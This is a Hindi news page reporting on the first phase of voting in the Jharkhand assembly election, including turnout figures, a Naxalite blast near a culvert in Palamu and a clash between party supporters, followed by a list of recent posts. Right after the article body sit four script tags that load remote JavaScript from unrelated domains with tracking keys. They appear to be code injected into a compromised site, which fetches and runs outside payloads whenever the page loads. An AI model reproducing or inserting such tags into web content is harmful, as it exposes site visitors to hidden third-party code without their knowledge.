Categories: इंडिया

झारखंड में मतदान प्रक्रिया जारी, अभी तक हुआ 48.83 प्रतिशत मतदान

<p>झारखंड विधानसभा चुनाव के पहले चरण में 13 सीटों पर वोट डाले जा रहे हैं। झारखंड विधानसभा के पहले फेज में करीब 37,83,055 वोटर 189 उम्मीदवारों के भाग्य का फैसला कर रहे हैं। दोपहर 1 बजे तक 48.83 प्रतिशत मतदान दर्ज किया गया है। चुनाव आयोग के अधिकारियों के अनुसार मतदान सुबह सात बजे शुरू हुआ और दोपहर तीन बजे तक चलेगा। पलामू में नक्सलियों के उपद्रव और बीजेपी-कांग्रेस समर्थक में झड़प के बीच 11 बजे तक 27.41 प्रतिशत मतदान दर्ज किया गया। पलामू में नक्सलियों ने बिशुनपुर में एक पुल को उड़ा दिया।</p>

<p>इस घटना में किसी के हताहत होने की खबर नहीं है। डेप्युटी कमिश्नर शशि रंजन ने बताया कि हमले की वजह से मतदान प्रभावित नहीं हुआ है और वोटिंग अभी भी जारी है। झारखंड चुनाव में सुरक्षा व्यवस्था के नोडल अधिकारी मुरारीलाल मीणा ने बताया कि हताश नक्सलियों ने मतदाताओं में भय पैदा करने के लिए बिशुनपुर के बानालाट और वीरानपुर के बीच जंगल में एक पुलिया के निकट यह विस्फोट किया। हालांकि इससे कोई नुकसान नहीं हुआ है। मीणा ने बताया कि सभी 13 विधानसभा क्षेत्रों में शांतिपूर्ण ढंग से मतदान जारी है और कहीं से भी किसी अप्रिय घटना की खबर नहीं है।</p>

<p>इधर, पलामू में चैनपुर के कोसियारा गांव में बीजेपी और कांग्रेस के समर्थकों के बीच झड़प हो गई। यहां कांग्रेस प्रत्याशी केएन त्रिपाठी ने बीजेपी प्रत्याशी आलोक चौरसिया और उनके समर्थकों पर बूथ लूटने का आरोप लगाया। सामने आई तस्वीरों में डाल्टेनगंज से कांग्रेस प्रत्याशी केएन त्रिपाठी रिवॉल्वर लहराते नजर आ रहे हैं। इस बीच चुनाव आयोग ने घटना का संज्ञान लिया है और जिला प्रशासन से इस संबंध में रिपोर्ट मांगी है।</p>

<p>&nbsp;</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1575104171729″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

भारत में सड़क दुर्घटनाओं को रोकने के लिए केंद्रीय कानून जरूरी: शांता कुमार

Shanta Kumar road accident prevention: पूर्व मुख्यमंत्री और पूर्व केंद्रीय मंत्री शांता कुमार ने केंद्रीय…

4 hours ago

Himachal: सीएम सुक्खू ने ईवीएम पर उठाए सवाल, बैलेट पेपर से चुनाव की मांग

Ballot paper elections in India: हिमाचल प्रदेश के मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने देश…

4 hours ago

Sirmour News : तेज रफ्तार गाड़ी की टक्कर से 26 वर्षीय युवती की मौत

Tragic Road Accident in Sirmour; सिरमौर जिले के पांवटा साहिब की तहसील में आंज भोज…

5 hours ago

Baba Siddique murder: बाबा सिद्दीकी सुपुर्द-ए-खाक, लॉरेंस गैंग की सलमान खान को भी नहीं छोड़ेंगे की धमकी

Mumbai: अजित पवार गुट के NCP नेता और पूर्व विधायक बाबा सिद्दीकी की शनिवार रात…

5 hours ago

Himachal: रथयात्रा के साथ कुल्लू दशहरा उत्सव की भव्य शुरुआत

Kullu Dussehra Begins: राज्यपाल शिव प्रताप शुक्ल ने रविवार को कुल्लू के रथ मैदान में…

5 hours ago

Himachal: भगवान रघुनाथ की भव्य शोभायात्रा के साथ आज शुरू होगा दशहरा

International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…

14 hours ago